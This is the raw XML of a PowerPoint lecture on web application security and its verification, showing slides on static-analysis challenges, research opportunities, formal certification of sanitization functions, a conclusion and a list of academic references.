            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Assignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sequencing, conditional branch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>goto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At least three string variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>String concatenation (or even just appending a symbol to a string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Equality testing between two string variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reachability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>for this class of programs is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>undecidable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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44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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References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45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Research Opportunities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Advanced and integrated program analyses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Formal certification of Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Development methods (including language design) for secure Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A completely new and secure Web (beyond http-related protocols)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46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smtClean="0"/>
              <a:t>Business Opportunities: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Code Review/Analysis Service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560536"/>
            <a:ext cx="8229600" cy="5226050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This requires a combination of knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Security domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Program analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Program testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Review process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There are real and growing demands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A few industry and academic groups are building up their capabilities.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47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Toward Formal Certification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Current commercial code analysis tools are not precise enough and rely on competence of the programmer/reviewer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Ideally, every sensitive Web application should go through a thorough and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formal verification/certification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>To be practical, one should probably focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>correctness of sanitization functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (which are functions that validate user’s input).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There are quite a few issues that need further research.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48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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p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49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Conclusion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Web application security has drawn much attention from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>industry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>academia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Making Web applications secure requires a combination of expertise in different areas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This provides great opportunities for research/development collaboration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It should also create good opportunities for starting new businesses.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50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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p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Selected References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 smtClean="0"/>
              <a:t>Huang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Securing Web Application Code by Static Analysis and Runtime Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>WWW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>2004.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Minamide,“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> Approximation of Dynamically Generated Web Pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>WWW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>2005.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Xie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> and Aiken, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Static Detection of Security Vulnerabilities in Scripting Languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>USENIX Security Symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> 2006.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Su and Wassermann, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>The Essence of Command Injection Attacks in Web Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>POPL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>2006.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Chess and West, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>Secure Programming with Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>, Pearson Education, Inc. 2007.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52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Selected References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 smtClean="0"/>
              <a:t>Lam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Securing Web Applications with Static and Dynamic Information Flow Tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>PEPM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>2008.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Yu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Verification of String Manipulation Programs Using Multi-Track Automata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” Tech Report, UCSB, 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Yu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Generating Vulnerability Signatures for String Manipulating Programs Using Automata-based Forward and Backward Symbolic Analyses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>IEEE/ACM ICASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>2009. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Kiezun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>et al.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Automatic Creation of SQL Injection and Cross-Site Scripting Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>ICSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>OWASP, http://www.owasp.org/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The CVE Site, http://cve.mitre.org/.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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11267</TotalTime>
  <Words>3743</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>763</Paragraphs>
  <Slides>53</Slides>
  <Notes>3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53</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="61" baseType="lpstr">
      <vt:lpstr>cmtt10</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Edge</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Web Application Security and Its Verification</vt:lpstr>
      <vt:lpstr>Caveats</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>How the Web Works</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Web Applications: Dynamic Contents</vt:lpstr>
      <vt:lpstr>Web Applications: Client-Side Script</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Vulnerable Web Applications</vt:lpstr>
      <vt:lpstr>A Common Vulnerability: SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Compromised Websites</vt:lpstr>
      <vt:lpstr>Compromised Websites (cont.)</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks</vt:lpstr>
      <vt:lpstr>What Changed from 2007 to 2010</vt:lpstr>
      <vt:lpstr>What Changed from 2010 to 2013</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection in PHP</vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection (cont.) </vt:lpstr>
      <vt:lpstr>Defenses against SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting in PHP</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting (cont.)</vt:lpstr>
      <vt:lpstr>Defenses against Cross-Site Scripting (cont.)</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Current Status</vt:lpstr>
      <vt:lpstr>An Example</vt:lpstr>
      <vt:lpstr>Control Flow Graph</vt:lpstr>
      <vt:lpstr>Dependency Graph (1/3)</vt:lpstr>
      <vt:lpstr>Dependency Graph (2/3)</vt:lpstr>
      <vt:lpstr>Dependency Graph (3/3)</vt:lpstr>
      <vt:lpstr>Alias</vt:lpstr>
      <vt:lpstr>Detecting Vulnerabilities by Taint Analysis</vt:lpstr>
      <vt:lpstr>Problems and Objectives</vt:lpstr>
      <vt:lpstr>Use of a Code Analysis Tool</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Challenges: Alias Analysis</vt:lpstr>
      <vt:lpstr>Challenges: Alias Analysis (cont.)</vt:lpstr>
      <vt:lpstr>Challenges: Strings and Numbers</vt:lpstr>
      <vt:lpstr>Challenges: A Theoretical Limitation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Research Opportunities</vt:lpstr>
      <vt:lpstr>Business Opportunities:  Code Review/Analysis Service</vt:lpstr>
      <vt:lpstr>Toward Formal Certification</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Selected References</vt:lpstr>
      <vt:lpstr>Selected References (cont.)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Talk at MFN 2010/05/14</dc:title>
  <dc:creator>tsay</dc:creator>
  <cp:lastModifiedBy>tsay</cp:lastModifiedBy>
  <cp:revision>567</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-06-21T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-07T04:03:15Z</dcterms:modified>
</cp:coreProperties>
</file>